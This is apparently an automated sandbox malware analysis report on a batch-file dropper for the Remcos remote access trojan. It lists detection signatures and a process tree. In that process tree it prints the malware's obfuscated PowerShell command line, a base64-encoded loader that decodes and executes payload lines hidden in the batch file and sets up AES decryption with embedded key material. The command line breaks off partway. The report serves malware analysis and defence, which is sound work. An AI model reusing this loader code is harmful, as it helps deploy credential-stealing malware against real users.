Windows
Analysis Report
z1PO20254540.bat
Overview
General Information
Detection
Batch Injector, Remcos
Score: 100
Range: 0 - 100
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Batch Injector
Yara detected Powershell decode and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains a sample name check
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Malicious Base64 Encoded PowerShell Keywords in Command Lines
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 3132 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z1PO20254540.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 2300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 3740 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\z1PO20254540.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 2520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 4144 cmdline:
"C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" -noprofile -windowst yle hidden -ep bypas s -Command "[Text.En coding]::U TF8.GetStr ing([Conve rt]::FromB ase64Strin g('JHVzZXJ OYW1lID0gJ GVudjpVU0V STkFNRTske WdyanogPSA iQzpcVXNlc nNcJHVzZXJ OYW1lXGR3b S5iYXQiO2l mIChUZXN0L VBhdGggJHl ncmp6KSB7I CAgIFdyaXR lLUhvc3QgI kJhdGNoIGZ pbGUgZm91b mQ6ICR5Z3J qeiIgLUZvc mVncm91bmR Db2xvciBDe WFuOyAgICA kZmlsZUxpb mVzID0gW1N 5c3RlbS5JT y5GaWxlXTo 6UmVhZEFsb ExpbmVzKCR 5Z3JqeiwgW 1N5c3RlbS5 UZXh0LkVuY 29kaW5nXTo 6VVRGOCk7I CAgIGZvcmV hY2ggKCRsa W5lIGluICR maWxlTGluZ XMpIHsgICA gICAgIGlmI CgkbGluZSA tbWF0Y2ggJ 146OjogPyg uKykkJykge yAgICAgICA gICAgIFdya XRlLUhvc3Q gIkluamVjd GlvbiBjb2R lIGRldGVjd GVkIGluIHR oZSBiYXRja CBmaWxlLiI gLUZvcmVnc m91bmRDb2x vciBDeWFuO yAgICAgICA gICAgIHRye SB7ICAgICA gICAgICAgI CAgICRkZWN vZGVkQnl0Z XMgPSBbU3l zdGVtLkNvb nZlcnRdOjp Gcm9tQmFzZ TY0U3RyaW5 nKCRtYXRja GVzWzFdLlR yaW0oKSk7I CAgICAgICA gICAgICAgI CRpbmplY3R pb25Db2RlI D0gW1N5c3R lbS5UZXh0L kVuY29kaW5 nXTo6VW5pY 29kZS5HZXR TdHJpbmcoJ GRlY29kZWR CeXRlcyk7I CAgICAgICA gICAgICAgI FdyaXRlLUh vc3QgIklua mVjdGlvbiB jb2RlIGRlY 29kZWQgc3V jY2Vzc2Z1b Gx5LiIgLUZ vcmVncm91b mRDb2xvciB HcmVlbjsgI CAgICAgICA gICAgICAgV 3JpdGUtSG9 zdCAiRXhlY 3V0aW5nIGl uamVjdGlvb iBjb2RlLi4 uIiAtRm9yZ Wdyb3VuZEN vbG9yIFllb GxvdzsgICA gICAgICAgI CAgICAgSW5 2b2tlLUV4c HJlc3Npb24 gJGluamVjd GlvbkNvZGU 7ICAgICAgI CAgICAgICA gIGJyZWFrO yAgICAgICA gICAgIH0gY 2F0Y2ggeyA gICAgICAgI CAgICAgICB Xcml0ZS1Ib 3N0ICJFcnJ vciBkdXJpb mcgZGVjb2R pbmcgb3IgZ XhlY3V0aW5 nIGluamVjd GlvbiBjb2R lOiAkXyIgL UZvcmVncm9 1bmRDb2xvc iBSZWQ7ICA gICAgICAgI CAgfTsgICA gICAgIH07I CAgIH07fSB lbHNlIHsgI CAgICBXcml 0ZS1Ib3N0I CJTeXN0ZW0 gRXJyb3I6I EJhdGNoIGZ pbGUgbm90I GZvdW5kOiA keWdyanoiI C1Gb3JlZ3J vdW5kQ29sb 3IgUmVkOyA gICBleGl0O 307ZnVuY3R pb24gcHJ4a mYoJHBhcmF tX3Zhcil7C SRhZXNfdmF yPVtTeXN0Z W0uU2VjdXJ pdHkuQ3J5c HRvZ3JhcGh 5LkFlc106O kNyZWF0ZSg pOwkkYWVzX 3Zhci5Nb2R lPVtTeXN0Z W0uU2VjdXJ pdHkuQ3J5c HRvZ3JhcGh 5LkNpcGhlc k1vZGVdOjp 
DQkM7CSRhZ XNfdmFyLlB hZGRpbmc9W 1N5c3RlbS5 TZWN1cml0e S5DcnlwdG9 ncmFwaHkuU GFkZGluZ01 vZGVdOjpQS 0NTNzsJJGF lc192YXIuS 2V5PVtTeXN 0ZW0uQ29ud mVydF06OkZ yb21CYXNlN jRTdHJpbmc oJ1ZwM0Vzb 01tRjVvc1l DUkxyQWc2Z 2phYlZtaHI 3RXFickRzN nZ6RHZQdDQ 9Jyk7CSRhZ XNfdmFyLkl WPVtTeXN0Z W0uQ29udmV ydF06OkZyb 21CYXNlNjR TdHJpbmcoJ 0VnTGhJcFc vUGtqYlJJT HR0ZmJ5aHc 9PScpOwkkZ GVjcnlwdG9 yX3Zhcj0kY WVzX3Zhci5 DcmVhdGVEZ WNyeXB0b3I oKTsJJHJld HVybl92YXI 9JGRlY3J5c HRvcl92YXI uVHJhbnNmb 3JtRmluYWx CbG9jaygkc GFyYW1fdmF yLCAwLCAkc GFyYW1fdmF yLkxlbmd0a Ck7CSRkZWN yeXB0b3Jfd mFyLkRpc3B vc2UoKTsJJ GFlc192YXI uRGlzcG9zZ SgpOwkkcmV 0dXJuX3Zhc jt9ZnVuY3R pb24genNqY 3MoJHBhcmF tX3Zhcil7C SRwcXFucj1 OZXctT2JqZ WN0IFN5c3R